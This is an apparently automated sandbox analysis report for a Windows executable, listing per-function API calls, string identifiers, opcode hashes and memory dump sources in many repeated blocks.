                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1f6c9cf14b1332bd2a715ef9028274bea2e2d3474f22d684c6e7df694e2c2858
                  • Instruction ID: 4fefaf874e48d477ad07891cd358d90355e2409dc64e1b8440a4ec7e753c2cf6
                  • Opcode Fuzzy Hash: 1f6c9cf14b1332bd2a715ef9028274bea2e2d3474f22d684c6e7df694e2c2858
                  • Instruction Fuzzy Hash: A5A012D516C2027C300C31427C02C3A031CC1C0B50330450AB006800C5574009051D31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 4307a8d669144cbae520c09d6ab8fe0ba3d0eda0ba8ad8b6e6728dd801e969b5
                  • Instruction ID: 4fefaf874e48d477ad07891cd358d90355e2409dc64e1b8440a4ec7e753c2cf6
                  • Opcode Fuzzy Hash: 4307a8d669144cbae520c09d6ab8fe0ba3d0eda0ba8ad8b6e6728dd801e969b5
                  • Instruction Fuzzy Hash: A5A012D516C2027C300C31427C02C3A031CC1C0B50330450AB006800C5574009051D31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 37a77709eb4e4947a8d8b2ced898184adf5994f46411cd89b3812ccee9ee6040
                  • Instruction ID: 4fefaf874e48d477ad07891cd358d90355e2409dc64e1b8440a4ec7e753c2cf6
                  • Opcode Fuzzy Hash: 37a77709eb4e4947a8d8b2ced898184adf5994f46411cd89b3812ccee9ee6040
                  • Instruction Fuzzy Hash: A5A012D516C2027C300C31427C02C3A031CC1C0B50330450AB006800C5574009051D31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DC36
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DC36
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • SetEndOfFile.KERNELBASE(?,00179104,?,?,-00001964), ref: 00179EC2
                  Similarity
                  • API ID: File
                  • String ID:
                  • API String ID: 749574446-0
                  APIs
                  • SetCurrentDirectoryW.KERNELBASE(?,0018A587,C:\Users\user\Desktop,00000000,001B946A,00000006), ref: 0018A326
                  Similarity
                  • API ID: CurrentDirectory
                  • String ID:
                  • API String ID: 1611563598-0
                  APIs
                  • CloseHandle.KERNELBASE(000000FF,?,?,0017968F,?,?,?,?,001A1FA1,000000FF), ref: 001796EB
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  APIs
                    • Part of subcall function 0017130B: GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                    • Part of subcall function 0017130B: SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0018B971
                  • EndDialog.USER32(?,00000006), ref: 0018B984
                  • GetDlgItem.USER32(?,0000006C), ref: 0018B9A0
                  • SetFocus.USER32(00000000), ref: 0018B9A7
                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0018B9E1
                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0018BA18
                  • FindFirstFileW.KERNEL32(?,?), ref: 0018BA2E
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0018BA4C
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0018BA5C
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0018BA78
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0018BA94
                  • _swprintf.LIBCMT ref: 0018BAC4
                    • Part of subcall function 0017400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0017401D
                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0018BAD7
                  • FindClose.KERNEL32(00000000), ref: 0018BADE
                  • _swprintf.LIBCMT ref: 0018BB37
                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 0018BB4A
                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0018BB67
                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0018BB87
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0018BB97
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0018BBB1
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0018BBC9
                  • _swprintf.LIBCMT ref: 0018BBF5
                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0018BC08
                  • _swprintf.LIBCMT ref: 0018BC5C
                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 0018BC6F
                    • Part of subcall function 0018A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0018A662
                    • Part of subcall function 0018A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,001AE600,?,?), ref: 0018A6B1
                  Strings
                  Similarity
                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                  • API String ID: 797121971-1840816070
                  APIs
                  • __EH_prolog.LIBCMT ref: 00177191
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 001772F1
                  • CloseHandle.KERNEL32(00000000), ref: 00177301
                    • Part of subcall function 00177BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00177C04
                    • Part of subcall function 00177BF5: GetLastError.KERNEL32 ref: 00177C4A
                    • Part of subcall function 00177BF5: CloseHandle.KERNEL32(?), ref: 00177C59
                  • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0017730C
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0017741A
                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00177446
                  • CloseHandle.KERNEL32(?), ref: 00177457
                  • GetLastError.KERNEL32 ref: 00177467
                  • RemoveDirectoryW.KERNEL32(?), ref: 001774B3
                  • DeleteFileW.KERNEL32(?), ref: 001774DB
                  Strings
                  Similarity
                  • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                  • API String ID: 3935142422-3508440684
                  APIs
                  Strings
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID: CMT$h%u$hc%u
                  • API String ID: 3004599000-3282847064
                  APIs
                  Strings
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                  • API String ID: 4168288129-2761157908
                  APIs
                  • __EH_prolog.LIBCMT ref: 001727F1
                  • _strlen.LIBCMT ref: 00172D7F
                    • Part of subcall function 0018137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0017B652,00000000,?,?,?,00010484), ref: 00181396
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00172EE0
                  Strings
Memory Dump Source
• Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                  • String ID: CMT
                  • API String ID: 1706572503-2756464174
                  APIs
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00198767
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00198771
                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0019877E
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  APIs
                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0018A662
                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,001AE600,?,?), ref: 0018A6B1
                  Similarity
                  • API ID: FormatInfoLocaleNumber
                  • String ID:
                  • API String ID: 2169056816-0
                  APIs
                  • GetLastError.KERNEL32(0018117C,?,00000200), ref: 00176EC9
                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00176EEA
                  Similarity
                  • API ID: ErrorFormatLastMessage
                  • String ID:
                  • API String ID: 3479602957-0
                  APIs
                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001A118F,?,?,00000008,?,?,001A0E2F,00000000), ref: 001A13C1
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  Strings
                  Similarity
                  • API ID:
                  • String ID: gj
                  • API String ID: 0-4203073231
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 0017AD1A
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0018EAC5), ref: 0018F068
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  APIs
                  Similarity
                  • API ID: HeapProcess
                  • String ID:
                  • API String ID: 54951025-0
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 24ac3b976f72b8cb925be76938e39708a31e755e1f2620b158eb84e899a4d75b
                  • Instruction ID: 09486bc07fe0774a1529acb4808cd204306b342521da30e1a641e5d68102420d
                  • Opcode Fuzzy Hash: 24ac3b976f72b8cb925be76938e39708a31e755e1f2620b158eb84e899a4d75b
                  • Instruction Fuzzy Hash: ECD1E5B1A043459FDB18EF28C88075BBBE0BF55308F04456DE8899B642D734EA59CF9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                  • Instruction ID: f553af5067035eee2339a82fab84ed9cb2ddca0d12d2b2f0f0052f7855550020
                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                  • Instruction Fuzzy Hash: 6CC1823A2051930EDF6F863A853403FBAA15AA6BB131A076DD4F3CB1D5FF20D564DA20
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 609a3354d60cd213b0ef820b34625d2d5b4f8c1bd2e93298271284b70fd3f371
                  • Instruction ID: c1084bb4cd39a0876d99c1f6c5014d227accd833cb45657274dcb522d63077da
                  • Opcode Fuzzy Hash: 609a3354d60cd213b0ef820b34625d2d5b4f8c1bd2e93298271284b70fd3f371
                  • Instruction Fuzzy Hash: D7E158745183848FC304CF69D49096ABBF0BF9A300F854A9EF5D587352C339EA59DBA2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                  • Instruction ID: 427cf8eb292c46e7ac9af970ba52fbb9a790c6694594c3ba678ebbe29321ee9c
                  • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                  • Instruction Fuzzy Hash: E5917BB02043458BDB28FF68C891BBE73E4AF90700F58092EF5A787282DB759745CB52
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9d1908899bc49766c007ecceb4f094a0cbb653ca1e295c95ec4363d67de41fa5
                  • Instruction ID: 01bf777f4a2c29a69374d2d343cd5a173f3acac5f65bf126cb78d5959edcb160
                  • Opcode Fuzzy Hash: 9d1908899bc49766c007ecceb4f094a0cbb653ca1e295c95ec4363d67de41fa5
                  • Instruction Fuzzy Hash: DA617871A80B0867DF389A288896FBF23D5EB55708F140A1AF883DB281D751DD43C75D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                  • Instruction ID: 68162f6547542f40e6c295b8146f884493308e5da33179916b0bfba2db3b50df
                  • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                  • Instruction Fuzzy Hash: 657140706043454BDB28FE28C4D1B7D77E4AFE0704F44492DF6968B282DB759B858F92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                  • Instruction ID: f0098eb06fcff89719179ac74797dfee32a254cc93a9951256f142f82332da31
                  • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                  • Instruction Fuzzy Hash: 61512971600A8C67EF3C8AE88895FBF77D99B53344F180919E982D7282C715ED478356
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3ff1f3844ac71d3b1b1fc34118ae0138b605acfff8e9cb8766ff6282e02a3977
                  • Instruction ID: 363812c6e780bd880ba62143cd9ffc23165a2c47856eed39e8223a39fec96129
                  • Opcode Fuzzy Hash: 3ff1f3844ac71d3b1b1fc34118ae0138b605acfff8e9cb8766ff6282e02a3977
                  • Instruction Fuzzy Hash: 9881808121D6D49DC7168F7C38A42F53EE25777341F1942FAC4CA86AA3C73A46D8D721
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7939c33eae9f288a698e7e350d4ef73f52bb2b2e7f915c48b073e87b2517c15a
                  • Instruction ID: a009b1bb7a0d40511033a71a53cdac3204bb5df0ed511d91868b3476796b39b2
                  • Opcode Fuzzy Hash: 7939c33eae9f288a698e7e350d4ef73f52bb2b2e7f915c48b073e87b2517c15a
                  • Instruction Fuzzy Hash: A6518D315083D54FC712CF28918446EBFF1AEEA318F5989DEE4E95B213D320D649CB92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: be64fa90f4695027f07b25f3b8872c358813380c1c39fac963984670b114ae9d
                  • Instruction ID: 7fbd1e2fa48dc1b11d293a170796ad3b85c896751160864f2669015ce5a8bb9e
                  • Opcode Fuzzy Hash: be64fa90f4695027f07b25f3b8872c358813380c1c39fac963984670b114ae9d
                  • Instruction Fuzzy Hash: 78512571A083128BC748CF19D49059AF7E1FFC8354F058A2EE899E7740DB34EA59CB96
                  Memory Dump Source
